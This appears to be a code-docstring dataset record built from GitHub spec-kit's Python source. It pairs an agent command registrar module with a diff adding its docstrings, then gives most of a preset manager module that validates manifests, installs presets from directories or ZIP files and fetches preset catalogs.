return {}, content
# Find second ---
end_marker = content.find("---", 3)
if end_marker == -1:
return {}, content
frontmatter_str = content[3:end_marker].strip()
body = content[end_marker + 3:].strip()
try:
frontmatter = yaml.safe_load(frontmatter_str) or {}
except yaml.YAMLError:
frontmatter = {}
return frontmatter, body
@staticmethod
def render_frontmatter(fm: dict) -> str:
if not fm:
return ""
yaml_str = yaml.dump(fm, default_flow_style=False, sort_keys=False)
return f"---\n{yaml_str}---\n"
def _adjust_script_paths(self, frontmatter: dict) -> dict:
if "scripts" in frontmatter:
for key in frontmatter["scripts"]:
script_path = frontmatter["scripts"][key]
if script_path.startswith("../../scripts/"):
frontmatter["scripts"][key] = f".specify/scripts/{script_path[14:]}"
return frontmatter
def render_markdown_command(
self,
frontmatter: dict,
body: str,
source_id: str,
context_note: str = None
) -> str:
if context_note is None:
context_note = f"\n<!-- Source: {source_id} -->\n"
return self.render_frontmatter(frontmatter) + "\n" + context_note + body
def render_toml_command(
self,
frontmatter: dict,
body: str,
source_id: str
) -> str:
toml_lines = []
if "description" in frontmatter:
desc = frontmatter["description"].replace('"', '\\"')
toml_lines.append(f'description = "{desc}"')
toml_lines.append("")
toml_lines.append(f"# Source: {source_id}")
toml_lines.append("")
toml_lines.append('prompt = """')
toml_lines.append(body)
toml_lines.append('"""')
return "\n".join(toml_lines)
def _convert_argument_placeholder(self, content: str, from_placeholder: str, to_placeholder: str) -> str:
return content.replace(from_placeholder, to_placeholder)
def register_commands(
self,
agent_name: str,
commands: List[Dict[str, Any]],
source_id: str,
source_dir: Path,
project_root: Path,
context_note: str = None
) -> List[str]:
if agent_name not in self.AGENT_CONFIGS:
raise ValueError(f"Unsupported agent: {agent_name}")
agent_config = self.AGENT_CONFIGS[agent_name]
commands_dir = project_root / agent_config["dir"]
commands_dir.mkdir(parents=True, exist_ok=True)
registered = []
for cmd_info in commands:
cmd_name = cmd_info["name"]
cmd_file = cmd_info["file"]
source_file = source_dir / cmd_file
if not source_file.exists():
continue
content = source_file.read_text(encoding="utf-8")
frontmatter, body = self.parse_frontmatter(content)
frontmatter = self._adjust_script_paths(frontmatter)
body = self._convert_argument_placeholder(
body, "$ARGUMENTS", agent_config["args"]
)
if agent_config["format"] == "markdown":
output = self.render_markdown_command(frontmatter, body, source_id, context_note)
elif agent_config["format"] == "toml":
output = self.render_toml_command(frontmatter, body, source_id)
else:
raise ValueError(f"Unsupported format: {agent_config['format']}")
dest_file = commands_dir / f"{cmd_name}{agent_config['extension']}"
dest_file.parent.mkdir(parents=True, exist_ok=True)
dest_file.write_text(output, encoding="utf-8")
if agent_name == "copilot":
self.write_copilot_prompt(project_root, cmd_name)
registered.append(cmd_name)
for alias in cmd_info.get("aliases", []):
alias_file = commands_dir / f"{alias}{agent_config['extension']}"
alias_file.parent.mkdir(parents=True, exist_ok=True)
alias_file.write_text(output, encoding="utf-8")
if agent_name == "copilot":
self.write_copilot_prompt(project_root, alias)
registered.append(alias)
return registered
@staticmethod
def write_copilot_prompt(project_root: Path, cmd_name: str) -> None:
prompts_dir = project_root / ".github" / "prompts"
prompts_dir.mkdir(parents=True, exist_ok=True)
prompt_file = prompts_dir / f"{cmd_name}.prompt.md"
prompt_file.write_text(f"---\nagent: {cmd_name}\n---\n", encoding="utf-8")
def register_commands_for_all_agents(
self,
commands: List[Dict[str, Any]],
source_id: str,
source_dir: Path,
project_root: Path,
context_note: str = None
) -> Dict[str, List[str]]:
results = {}
for agent_name, agent_config in self.AGENT_CONFIGS.items():
agent_dir = project_root / agent_config["dir"].split("/")[0]
if agent_dir.exists():
try:
registered = self.register_commands(
agent_name, commands, source_id, source_dir, project_root,
context_note=context_note
)
if registered:
results[agent_name] = registered
except ValueError:
continue
return results
def unregister_commands(
self,
registered_commands: Dict[str, List[str]],
project_root: Path
) -> None:
for agent_name, cmd_names in registered_commands.items():
if agent_name not in self.AGENT_CONFIGS:
continue
agent_config = self.AGENT_CONFIGS[agent_name]
commands_dir = project_root / agent_config["dir"]
for cmd_name in cmd_names:
cmd_file = commands_dir / f"{cmd_name}{agent_config['extension']}"
if cmd_file.exists():
cmd_file.unlink()
if agent_name == "copilot":
prompt_file = project_root / ".github" / "prompts" / f"{cmd_name}.prompt.md"
if prompt_file.exists():
prompt_file.unlink() | --- +++ @@ -1,3 +1,10 @@+"""
+Agent Command Registrar for Spec Kit
+
+Shared infrastructure for registering commands with AI agents.
+Used by both the extension system and the preset system to write
+command files into agent-specific directories in the correct format.
+"""
from pathlib import Path
from typing import Dict, List, Any
@@ -6,6 +13,12 @@
class CommandRegistrar:
+ """Handles registration of commands with AI agents.
+
+ Supports writing command files in Markdown or TOML format to the
+ appropriate agent directory, with correct argument placeholders
+ and companion files (e.g. Copilot .prompt.md).
+ """
# Agent configurations with directory, format, and argument placeholder
AGENT_CONFIGS = {
@@ -139,6 +152,14 @@
@staticmethod
def parse_frontmatter(content: str) -> tuple[dict, str]:
+ """Parse YAML frontmatter from Markdown content.
+
+ Args:
+ content: Markdown content with YAML frontmatter
+
+ Returns:
+ Tuple of (frontmatter_dict, body_content)
+ """
if not content.startswith("---"):
return {}, content
@@ -159,6 +180,14 @@
@staticmethod
def render_frontmatter(fm: dict) -> str:
+ """Render frontmatter dictionary as YAML.
+
+ Args:
+ fm: Frontmatter dictionary
+
+ Returns:
+ YAML-formatted frontmatter with delimiters
+ """
if not fm:
return ""
@@ -166,6 +195,14 @@ return f"---\n{yaml_str}---\n"
def _adjust_script_paths(self, frontmatter: dict) -> dict:
+ """Adjust script paths from extension-relative to repo-relative.
+
+ Args:
+ frontmatter: Frontmatter dictionary
+
+ Returns:
+ Modified frontmatter with adjusted paths
+ """
if "scripts" in frontmatter:
for key in frontmatter["scripts"]:
script_path = frontmatter["scripts"][key]
@@ -180,6 +217,17 @@ source_id: str,
context_note: str = None
) -> str:
+ """Render command in Markdown format.
+
+ Args:
+ frontmatter: Command frontmatter
+ body: Command body content
+ source_id: Source identifier (extension or preset ID)
+ context_note: Custom context comment (default: <!-- Source: {source_id} -->)
+
+ Returns:
+ Formatted Markdown command file content
+ """
if context_note is None:
context_note = f"\n<!-- Source: {source_id} -->\n"
return self.render_frontmatter(frontmatter) + "\n" + context_note + body
@@ -190,6 +238,16 @@ body: str,
source_id: str
) -> str:
+ """Render command in TOML format.
+
+ Args:
+ frontmatter: Command frontmatter
+ body: Command body content
+ source_id: Source identifier (extension or preset ID)
+
+ Returns:
+ Formatted TOML command file content
+ """
toml_lines = []
if "description" in frontmatter:
@@ -207,6 +265,16 @@ return "\n".join(toml_lines)
def _convert_argument_placeholder(self, content: str, from_placeholder: str, to_placeholder: str) -> str:
+ """Convert argument placeholder format.
+
+ Args:
+ content: Command content
+ from_placeholder: Source placeholder (e.g., "$ARGUMENTS")
+ to_placeholder: Target placeholder (e.g., "{{args}}")
+
+ Returns:
+ Content with converted placeholders
+ """
return content.replace(from_placeholder, to_placeholder)
def register_commands(
@@ -218,6 +286,22 @@ project_root: Path,
context_note: str = None
) -> List[str]:
+ """Register commands for a specific agent.
+
+ Args:
+ agent_name: Agent name (claude, gemini, copilot, etc.)
+ commands: List of command info dicts with 'name', 'file', and optional 'aliases'
+ source_id: Identifier of the source (extension or preset ID)
+ source_dir: Directory containing command source files
+ project_root: Path to project root
+ context_note: Custom context comment for markdown output
+
+ Returns:
+ List of registered command names
+
+ Raises:
+ ValueError: If agent is not supported
+ """
if agent_name not in self.AGENT_CONFIGS:
raise ValueError(f"Unsupported agent: {agent_name}")
@@ -272,6 +356,12 @@
@staticmethod
def write_copilot_prompt(project_root: Path, cmd_name: str) -> None:
+ """Generate a companion .prompt.md file for a Copilot agent command.
+
+ Args:
+ project_root: Path to project root
+ cmd_name: Command name (e.g. 'speckit.my-ext.example')
+ """
prompts_dir = project_root / ".github" / "prompts"
prompts_dir.mkdir(parents=True, exist_ok=True)
prompt_file = prompts_dir / f"{cmd_name}.prompt.md"
@@ -285,6 +375,18 @@ project_root: Path,
context_note: str = None
) -> Dict[str, List[str]]:
+ """Register commands for all detected agents in the project.
+
+ Args:
+ commands: List of command info dicts
+ source_id: Identifier of the source (extension or preset ID)
+ source_dir: Directory containing command source files
+ project_root: Path to project root
+ context_note: Custom context comment for markdown output
+
+ Returns:
+ Dictionary mapping agent names to list of registered commands
+ """
results = {}
for agent_name, agent_config in self.AGENT_CONFIGS.items():
@@ -308,6 +410,12 @@ registered_commands: Dict[str, List[str]],
project_root: Path
) -> None:
+ """Remove previously registered command files from agent directories.
+
+ Args:
+ registered_commands: Dict mapping agent names to command name lists
+ project_root: Path to project root
+ """
for agent_name, cmd_names in registered_commands.items():
if agent_name not in self.AGENT_CONFIGS:
continue
@@ -323,4 +431,4 @@ if agent_name == "copilot":
prompt_file = project_root / ".github" / "prompts" / f"{cmd_name}.prompt.md"
if prompt_file.exists():
- prompt_file.unlink()+ prompt_file.unlink()
| https://raw.githubusercontent.com/github/spec-kit/HEAD/src/specify_cli/agents.py |
Generate descriptive docstrings automatically |
import copy
import json
import hashlib
import os
import tempfile
import zipfile
import shutil
from dataclasses import dataclass
from pathlib import Path
from typing import Optional, Dict, List, Any
from datetime import datetime, timezone
import re
import yaml
from packaging import version as pkg_version
from packaging.specifiers import SpecifierSet, InvalidSpecifier
from .extensions import ExtensionRegistry, normalize_priority
@dataclass
class PresetCatalogEntry:
url: str
name: str
priority: int
install_allowed: bool
description: str = ""
class PresetError(Exception):
pass
class PresetValidationError(PresetError):
pass
class PresetCompatibilityError(PresetError):
pass
VALID_PRESET_TEMPLATE_TYPES = {"template", "command", "script"}
class PresetManifest:
SCHEMA_VERSION = "1.0"
REQUIRED_FIELDS = ["schema_version", "preset", "requires", "provides"]
def __init__(self, manifest_path: Path):
self.path = manifest_path
self.data = self._load_yaml(manifest_path)
self._validate()
def _load_yaml(self, path: Path) -> dict:
try:
with open(path, 'r') as f:
return yaml.safe_load(f) or {}
except yaml.YAMLError as e:
raise PresetValidationError(f"Invalid YAML in {path}: {e}")
except FileNotFoundError:
raise PresetValidationError(f"Manifest not found: {path}")
def _validate(self):
# Check required top-level fields
for field in self.REQUIRED_FIELDS:
if field not in self.data:
raise PresetValidationError(f"Missing required field: {field}")
# Validate schema version
if self.data["schema_version"] != self.SCHEMA_VERSION:
raise PresetValidationError(
f"Unsupported schema version: {self.data['schema_version']} "
f"(expected {self.SCHEMA_VERSION})"
)
# Validate preset metadata
pack = self.data["preset"]
for field in ["id", "name", "version", "description"]:
if field not in pack:
raise PresetValidationError(f"Missing preset.{field}")
# Validate pack ID format
if not re.match(r'^[a-z0-9-]+$', pack["id"]):
raise PresetValidationError(
f"Invalid preset ID '{pack['id']}': "
"must be lowercase alphanumeric with hyphens only"
)
# Validate semantic version
try:
pkg_version.Version(pack["version"])
except pkg_version.InvalidVersion:
raise PresetValidationError(f"Invalid version: {pack['version']}")
# Validate requires section
requires = self.data["requires"]
if "speckit_version" not in requires:
raise PresetValidationError("Missing requires.speckit_version")
# Validate provides section
provides = self.data["provides"]
if "templates" not in provides or not provides["templates"]:
raise PresetValidationError(
"Preset must provide at least one template"
)
# Validate templates
for tmpl in provides["templates"]:
if "type" not in tmpl or "name" not in tmpl or "file" not in tmpl:
raise PresetValidationError(
"Template missing 'type', 'name', or 'file'"
)
if tmpl["type"] not in VALID_PRESET_TEMPLATE_TYPES:
raise PresetValidationError(
f"Invalid template type '{tmpl['type']}': "
f"must be one of {sorted(VALID_PRESET_TEMPLATE_TYPES)}"
)
# Validate file path safety: must be relative, no parent traversal
file_path = tmpl["file"]
normalized = os.path.normpath(file_path)
if os.path.isabs(normalized) or normalized.startswith(".."):
raise PresetValidationError(
f"Invalid template file path '{file_path}': "
"must be a relative path within the preset directory"
)
# Validate template name format
if tmpl["type"] == "command":
# Commands use dot notation (e.g. speckit.specify)
if not re.match(r'^[a-z0-9.-]+$', tmpl["name"]):
raise PresetValidationError(
f"Invalid command name '{tmpl['name']}': "
"must be lowercase alphanumeric with hyphens and dots only"
)
else:
if not re.match(r'^[a-z0-9-]+$', tmpl["name"]):
raise PresetValidationError(
f"Invalid template name '{tmpl['name']}': "
"must be lowercase alphanumeric with hyphens only"
)
@property
def id(self) -> str:
return self.data["preset"]["id"]
@property
def name(self) -> str:
return self.data["preset"]["name"]
@property
def version(self) -> str:
return self.data["preset"]["version"]
@property
def description(self) -> str:
return self.data["preset"]["description"]
@property
def author(self) -> str:
return self.data["preset"].get("author", "")
@property
def requires_speckit_version(self) -> str:
return self.data["requires"]["speckit_version"]
@property
def templates(self) -> List[Dict[str, Any]]:
return self.data["provides"]["templates"]
@property
def tags(self) -> List[str]:
return self.data.get("tags", [])
def get_hash(self) -> str:
with open(self.path, 'rb') as f:
return f"sha256:{hashlib.sha256(f.read()).hexdigest()}"
class PresetRegistry:
REGISTRY_FILE = ".registry"
SCHEMA_VERSION = "1.0"
def __init__(self, packs_dir: Path):
self.packs_dir = packs_dir
self.registry_path = packs_dir / self.REGISTRY_FILE
self.data = self._load()
def _load(self) -> dict:
if not self.registry_path.exists():
return {
"schema_version": self.SCHEMA_VERSION,
"presets": {}
}
try:
with open(self.registry_path, 'r') as f:
return json.load(f)
except (json.JSONDecodeError, FileNotFoundError):
return {
"schema_version": self.SCHEMA_VERSION,
"presets": {}
}
def _save(self):
self.packs_dir.mkdir(parents=True, exist_ok=True)
with open(self.registry_path, 'w') as f:
json.dump(self.data, f, indent=2)
def add(self, pack_id: str, metadata: dict):
self.data["presets"][pack_id] = {
**metadata,
"installed_at": datetime.now(timezone.utc).isoformat()
}
self._save()
def remove(self, pack_id: str):
if pack_id in self.data["presets"]:
del self.data["presets"][pack_id]
self._save()
def update(self, pack_id: str, updates: dict):
if pack_id not in self.data["presets"]:
raise KeyError(f"Preset '{pack_id}' not found in registry")
existing = self.data["presets"][pack_id]
# Handle corrupted registry entries (e.g., string/list instead of dict)
if not isinstance(existing, dict):
existing = {}
# Merge: existing fields preserved, new fields override
merged = {**existing, **updates}
# Always preserve original installed_at based on key existence, not truthiness,
# to handle cases where the field exists but may be falsy (legacy/corruption)
if "installed_at" in existing:
merged["installed_at"] = existing["installed_at"]
else:
# If not present in existing, explicitly remove from merged if caller provided it
merged.pop("installed_at", None)
self.data["presets"][pack_id] = merged
self._save()
def get(self, pack_id: str) -> Optional[dict]:
return self.data["presets"].get(pack_id)
def list(self) -> Dict[str, dict]:
return self.data["presets"]
def list_by_priority(self) -> List[tuple]:
packs = self.data.get("presets", {}) or {}
if not isinstance(packs, dict):
packs = {}
sortable_packs = []
for pack_id, meta in packs.items():
if not isinstance(meta, dict):
continue
metadata_copy = copy.deepcopy(meta)
metadata_copy["priority"] = normalize_priority(metadata_copy.get("priority", 10))
sortable_packs.append((pack_id, metadata_copy))
return sorted(
sortable_packs,
key=lambda item: (item[1]["priority"], item[0]),
)
def is_installed(self, pack_id: str) -> bool:
return pack_id in self.data["presets"]
class PresetManager:
def __init__(self, project_root: Path):
self.project_root = project_root
self.presets_dir = project_root / ".specify" / "presets"
self.registry = PresetRegistry(self.presets_dir)
def check_compatibility(
self,
manifest: PresetManifest,
speckit_version: str
) -> bool:
required = manifest.requires_speckit_version
current = pkg_version.Version(speckit_version)
try:
specifier = SpecifierSet(required)
if current not in specifier:
raise PresetCompatibilityError(
f"Preset requires spec-kit {required}, "
f"but {speckit_version} is installed.\n"
f"Upgrade spec-kit with: uv tool install specify-cli --force"
)
except InvalidSpecifier:
raise PresetCompatibilityError(
f"Invalid version specifier: {required}"
)
return True
def _register_commands(
self,
manifest: PresetManifest,
preset_dir: Path
) -> Dict[str, List[str]]:
command_templates = [
t for t in manifest.templates if t.get("type") == "command"
]
if not command_templates:
return {}
# Filter out extension command overrides if the extension isn't installed.
# Command names follow the pattern: speckit.<ext-id>.<cmd-name>
# Core commands (e.g. speckit.specify) have only one dot — always register.
extensions_dir = self.project_root / ".specify" / "extensions"
filtered = []
for cmd in command_templates:
parts = cmd["name"].split(".")
if len(parts) >= 3 and parts[0] == "speckit":
ext_id = parts[1]
if not (extensions_dir / ext_id).is_dir():
continue
filtered.append(cmd)
if not filtered:
return {}
try:
from .agents import CommandRegistrar
except ImportError:
return {}
registrar = CommandRegistrar()
return registrar.register_commands_for_all_agents(
filtered, manifest.id, preset_dir, self.project_root
)
def _unregister_commands(self, registered_commands: Dict[str, List[str]]) -> None:
try:
from .agents import CommandRegistrar
except ImportError:
return
registrar = CommandRegistrar()
registrar.unregister_commands(registered_commands, self.project_root)
def _get_skills_dir(self) -> Optional[Path]:
from . import load_init_options, _get_skills_dir
opts = load_init_options(self.project_root)
if not opts.get("ai_skills"):
return None
agent = opts.get("ai")
if not agent:
return None
skills_dir = _get_skills_dir(self.project_root, agent)
if not skills_dir.is_dir():
return None
return skills_dir
def _register_skills(
self,
manifest: "PresetManifest",
preset_dir: Path,
) -> List[str]:
command_templates = [
t for t in manifest.templates if t.get("type") == "command"
]
if not command_templates:
return []
# Filter out extension command overrides if the extension isn't installed,
# matching the same logic used by _register_commands().
extensions_dir = self.project_root / ".specify" / "extensions"
filtered = []
for cmd in command_templates:
parts = cmd["name"].split(".")
if len(parts) >= 3 and parts[0] == "speckit":
ext_id = parts[1]
if not (extensions_dir / ext_id).is_dir():
continue
filtered.append(cmd)
if not filtered:
return []
skills_dir = self._get_skills_dir()
if not skills_dir:
return []
from . import SKILL_DESCRIPTIONS, load_init_options
opts = load_init_options(self.project_root)
selected_ai = opts.get("ai", "")
written: List[str] = []
for cmd_tmpl in filtered:
cmd_name = cmd_tmpl["name"]
cmd_file_rel = cmd_tmpl["file"]
source_file = preset_dir / cmd_file_rel
if not source_file.exists():
continue
# Derive the short command name (e.g. "specify" from "speckit.specify")
short_name = cmd_name
if short_name.startswith("speckit."):
short_name = short_name[len("speckit."):]
# Kimi CLI discovers skills by directory name and invokes them as
# /skill:<name> — use dot separator to match packaging convention.
if selected_ai == "kimi":
skill_name = f"speckit.{short_name}"
else:
skill_name = f"speckit-{short_name}"
# Only overwrite if the skill already exists (i.e. --ai-skills was used)
skill_subdir = skills_dir / skill_name
if not skill_subdir.exists():
continue
# Parse the command file
content = source_file.read_text(encoding="utf-8")
if content.startswith("---"):
parts = content.split("---", 2)
if len(parts) >= 3:
frontmatter = yaml.safe_load(parts[1])
if not isinstance(frontmatter, dict):
frontmatter = {}
body = parts[2].strip()
else:
frontmatter = {}
body = content
else:
frontmatter = {}
body = content
original_desc = frontmatter.get("description", "")
enhanced_desc = SKILL_DESCRIPTIONS.get(
short_name,
original_desc or f"Spec-kit workflow command: {short_name}",
)
frontmatter_data = {
"name": skill_name,
"description": enhanced_desc,
"compatibility": "Requires spec-kit project structure with .specify/ directory",
"metadata": {
"author": "github-spec-kit",
"source": f"preset:{manifest.id}",
},
}
frontmatter_text = yaml.safe_dump(frontmatter_data, sort_keys=False).strip()
skill_content = (
f"---\n"
f"{frontmatter_text}\n"
f"---\n\n"
f"# Speckit {short_name.title()} Skill\n\n"
f"{body}\n"
)
skill_file = skill_subdir / "SKILL.md"
skill_file.write_text(skill_content, encoding="utf-8")
written.append(skill_name)
return written
def _unregister_skills(self, skill_names: List[str], preset_dir: Path) -> None:
if not skill_names:
return
skills_dir = self._get_skills_dir()
if not skills_dir:
return
from . import SKILL_DESCRIPTIONS
# Locate core command templates from the project's installed templates
core_templates_dir = self.project_root / ".specify" / "templates" / "commands"
for skill_name in skill_names:
# Derive command name from skill name (speckit-specify -> specify)
short_name = skill_name
if short_name.startswith("speckit-"):
short_name = short_name[len("speckit-"):]
elif short_name.startswith("speckit."):
short_name = short_name[len("speckit."):]
skill_subdir = skills_dir / skill_name
skill_file = skill_subdir / "SKILL.md"
if not skill_file.exists():
continue
# Try to find the core command template
core_file = core_templates_dir / f"{short_name}.md" if core_templates_dir.exists() else None
if core_file and not core_file.exists():
core_file = None
if core_file:
# Restore from core template
content = core_file.read_text(encoding="utf-8")
if content.startswith("---"):
parts = content.split("---", 2)
if len(parts) >= 3:
frontmatter = yaml.safe_load(parts[1])
if not isinstance(frontmatter, dict):
frontmatter = {}
body = parts[2].strip()
else:
frontmatter = {}
body = content
else:
frontmatter = {}
body = content
original_desc = frontmatter.get("description", "")
enhanced_desc = SKILL_DESCRIPTIONS.get(
short_name,
original_desc or f"Spec-kit workflow command: {short_name}",
)
frontmatter_data = {
"name": skill_name,
"description": enhanced_desc,
"compatibility": "Requires spec-kit project structure with .specify/ directory",
"metadata": {
"author": "github-spec-kit",
"source": f"templates/commands/{short_name}.md",
},
}
frontmatter_text = yaml.safe_dump(frontmatter_data, sort_keys=False).strip()
skill_content = (
f"---\n"
f"{frontmatter_text}\n"
f"---\n\n"
f"# Speckit {short_name.title()} Skill\n\n"
f"{body}\n"
)
skill_file.write_text(skill_content, encoding="utf-8")
else:
# No core template — remove the skill entirely
shutil.rmtree(skill_subdir)
def install_from_directory(
self,
source_dir: Path,
speckit_version: str,
priority: int = 10,
) -> PresetManifest:
# Validate priority
if priority < 1:
raise PresetValidationError("Priority must be a positive integer (1 or higher)")
manifest_path = source_dir / "preset.yml"
manifest = PresetManifest(manifest_path)
self.check_compatibility(manifest, speckit_version)
if self.registry.is_installed(manifest.id):
raise PresetError(
f"Preset '{manifest.id}' is already installed. "
f"Use 'specify preset remove {manifest.id}' first."
)
dest_dir = self.presets_dir / manifest.id
if dest_dir.exists():
shutil.rmtree(dest_dir)
shutil.copytree(source_dir, dest_dir)
# Register command overrides with AI agents
registered_commands = self._register_commands(manifest, dest_dir)
# Update corresponding skills when --ai-skills was previously used
registered_skills = self._register_skills(manifest, dest_dir)
self.registry.add(manifest.id, {
"version": manifest.version,
"source": "local",
"manifest_hash": manifest.get_hash(),
"enabled": True,
"priority": priority,
"registered_commands": registered_commands,
"registered_skills": registered_skills,
})
return manifest
def install_from_zip(
self,
zip_path: Path,
speckit_version: str,
priority: int = 10,
) -> PresetManifest:
# Validate priority early
if priority < 1:
raise PresetValidationError("Priority must be a positive integer (1 or higher)")
with tempfile.TemporaryDirectory() as tmpdir:
temp_path = Path(tmpdir)
with zipfile.ZipFile(zip_path, 'r') as zf:
temp_path_resolved = temp_path.resolve()
for member in zf.namelist():
member_path = (temp_path / member).resolve()
try:
member_path.relative_to(temp_path_resolved)
except ValueError:
raise PresetValidationError(
f"Unsafe path in ZIP archive: {member} "
"(potential path traversal)"
)
zf.extractall(temp_path)
pack_dir = temp_path
manifest_path = pack_dir / "preset.yml"
if not manifest_path.exists():
subdirs = [d for d in temp_path.iterdir() if d.is_dir()]
if len(subdirs) == 1:
pack_dir = subdirs[0]
manifest_path = pack_dir / "preset.yml"
if not manifest_path.exists():
raise PresetValidationError(
"No preset.yml found in ZIP file"
)
return self.install_from_directory(pack_dir, speckit_version, priority)
def remove(self, pack_id: str) -> bool:
if not self.registry.is_installed(pack_id):
return False
# Unregister commands from AI agents
metadata = self.registry.get(pack_id)
registered_commands = metadata.get("registered_commands", {}) if metadata else {}
if registered_commands:
self._unregister_commands(registered_commands)
# Restore original skills when preset is removed
registered_skills = metadata.get("registered_skills", []) if metadata else []
pack_dir = self.presets_dir / pack_id
if registered_skills:
self._unregister_skills(registered_skills, pack_dir)
if pack_dir.exists():
shutil.rmtree(pack_dir)
self.registry.remove(pack_id)
return True
def list_installed(self) -> List[Dict[str, Any]]:
result = []
for pack_id, metadata in self.registry.list().items():
# Ensure metadata is a dictionary to avoid AttributeError when using .get()
if not isinstance(metadata, dict):
metadata = {}
pack_dir = self.presets_dir / pack_id
manifest_path = pack_dir / "preset.yml"
try:
manifest = PresetManifest(manifest_path)
result.append({
"id": pack_id,
"name": manifest.name,
"version": metadata.get("version", manifest.version),
"description": manifest.description,
"enabled": metadata.get("enabled", True),
"installed_at": metadata.get("installed_at"),
"template_count": len(manifest.templates),
"tags": manifest.tags,
"priority": normalize_priority(metadata.get("priority")),
})
except PresetValidationError:
result.append({
"id": pack_id,
"name": pack_id,
"version": metadata.get("version", "unknown"),
"description": "⚠️ Corrupted preset",
"enabled": False,
"installed_at": metadata.get("installed_at"),
"template_count": 0,
"tags": [],
"priority": normalize_priority(metadata.get("priority")),
})
return result
def get_pack(self, pack_id: str) -> Optional[PresetManifest]:
if not self.registry.is_installed(pack_id):
return None
pack_dir = self.presets_dir / pack_id
manifest_path = pack_dir / "preset.yml"
try:
return PresetManifest(manifest_path)
except PresetValidationError:
return None
class PresetCatalog:
DEFAULT_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/presets/catalog.json"
COMMUNITY_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/presets/catalog.community.json"
CACHE_DURATION = 3600 # 1 hour in seconds
def __init__(self, project_root: Path):
self.project_root = project_root
self.presets_dir = project_root / ".specify" / "presets"
self.cache_dir = self.presets_dir / ".cache"
self.cache_file = self.cache_dir / "catalog.json"
self.cache_metadata_file = self.cache_dir / "catalog-metadata.json"
def _validate_catalog_url(self, url: str) -> None:
from urllib.parse import urlparse
parsed = urlparse(url)
is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
if parsed.scheme != "https" and not (
parsed.scheme == "http" and is_localhost
):
raise PresetValidationError(
f"Catalog URL must use HTTPS (got {parsed.scheme}://). "
"HTTP is only allowed for localhost."
)
if not parsed.netloc:
raise PresetValidationError(
"Catalog URL must be a valid URL with a host."
)
def _load_catalog_config(self, config_path: Path) -> Optional[List[PresetCatalogEntry]]:
if not config_path.exists():
return None
try:
data = yaml.safe_load(config_path.read_text()) or {}
except (yaml.YAMLError, OSError) as e:
raise PresetValidationError(
f"Failed to read catalog config {config_path}: {e}"
)
if not isinstance(data, dict):
raise PresetValidationError(
f"Invalid catalog config {config_path}: expected a mapping at root, got {type(data).__name__}"
)
catalogs_data = data.get("catalogs", [])
if not catalogs_data:
return None
if not isinstance(catalogs_data, list):
raise PresetValidationError(
f"Invalid catalog config: 'catalogs' must be a list, got {type(catalogs_data).__name__}"
)
entries: List[PresetCatalogEntry] = []
for idx, item in enumerate(catalogs_data):
if not isinstance(item, dict):
raise PresetValidationError(
f"Invalid catalog entry at index {idx}: expected a mapping, got {type(item).__name__}"
)
url = str(item.get("url", "")).strip()
if not url:
continue
self._validate_catalog_url(url)
try:
priority = int(item.get("priority", idx + 1))
except (TypeError, ValueError):
raise PresetValidationError(
f"Invalid priority for catalog '{item.get('name', idx + 1)}': "
f"expected integer, got {item.get('priority')!r}"
)
raw_install = item.get("install_allowed", False)
if isinstance(raw_install, str):
install_allowed = raw_install.strip().lower() in ("true", "yes", "1")
else:
install_allowed = bool(raw_install)
entries.append(PresetCatalogEntry(
url=url,
name=str(item.get("name", f"catalog-{idx + 1}")),
priority=priority,
install_allowed=install_allowed,
description=str(item.get("description", "")),
))
entries.sort(key=lambda e: e.priority)
return entries if entries else None
def get_active_catalogs(self) -> List[PresetCatalogEntry]:
import sys
# 1. SPECKIT_PRESET_CATALOG_URL env var replaces all defaults
if env_value := os.environ.get("SPECKIT_PRESET_CATALOG_URL"):
catalog_url = env_value.strip()
self._validate_catalog_url(catalog_url)
if catalog_url != self.DEFAULT_CATALOG_URL:
if not getattr(self, "_non_default_catalog_warning_shown", False):
print(
"Warning: Using non-default preset catalog. "
"Only use catalogs from sources you trust.",
file=sys.stderr,
)
self._non_default_catalog_warning_shown = True
return [PresetCatalogEntry(url=catalog_url, name="custom", priority=1, install_allowed=True, description="Custom catalog via SPECKIT_PRESET_CATALOG_URL")]
# 2. Project-level config overrides all defaults
project_config_path = self.project_root / ".specify" / "preset-catalogs.yml"
catalogs = self._load_catalog_config(project_config_path)
if catalogs is not None:
return catalogs
# 3. User-level config
user_config_path = Path.home() / ".specify" / "preset-catalogs.yml"
catalogs = self._load_catalog_config(user_config_path)
if catalogs is not None:
return catalogs
# 4. Built-in default stack
return [
PresetCatalogEntry(url=self.DEFAULT_CATALOG_URL, name="default", priority=1, install_allowed=True, description="Built-in catalog of installable presets"),
PresetCatalogEntry(url=self.COMMUNITY_CATALOG_URL, name="community", priority=2, install_allowed=False, description="Community-contributed presets (discovery only)"),
]
def get_catalog_url(self) -> str:
active = self.get_active_catalogs()
return active[0].url if active else self.DEFAULT_CATALOG_URL
def _get_cache_paths(self, url: str):
if url == self.DEFAULT_CATALOG_URL:
return self.cache_file, self.cache_metadata_file
url_hash = hashlib.sha256(url.encode()).hexdigest()[:16]
return (
self.cache_dir / f"catalog-{url_hash}.json",
self.cache_dir / f"catalog-{url_hash}-metadata.json",
)
def _is_url_cache_valid(self, url: str) -> bool:
cache_file, metadata_file = self._get_cache_paths(url)
if not cache_file.exists() or not metadata_file.exists():
return False
try:
metadata = json.loads(metadata_file.read_text())
cached_at = datetime.fromisoformat(metadata.get("cached_at", ""))
if cached_at.tzinfo is None:
cached_at = cached_at.replace(tzinfo=timezone.utc)
age_seconds = (
datetime.now(timezone.utc) - cached_at
).total_seconds()
return age_seconds < self.CACHE_DURATION
except (json.JSONDecodeError, ValueError, KeyError, TypeError):
return False
def _fetch_single_catalog(self, entry: PresetCatalogEntry, force_refresh: bool = False) -> Dict[str, Any]:
cache_file, metadata_file = self._get_cache_paths(entry.url)
if not force_refresh and self._is_url_cache_valid(entry.url):
try:
return json.loads(cache_file.read_text())
except json.JSONDecodeError:
pass
try:
import urllib.request
import urllib.error
with urllib.request.urlopen(entry.url, timeout=10) as response:
catalog_data = json.loads(response.read())
if (
"schema_version" not in catalog_data
or "presets" not in catalog_data
):
raise PresetError("Invalid preset catalog format")
self.cache_dir.mkdir(parents=True, exist_ok=True)
cache_file.write_text(json.dumps(catalog_data, indent=2))
metadata = {
"cached_at": datetime.now(timezone.utc).isoformat(),
"catalog_url": entry.url,
}
metadata_file.write_text(json.dumps(metadata, indent=2))
return catalog_data
except (ImportError, Exception) as e:
if isinstance(e, PresetError):
raise
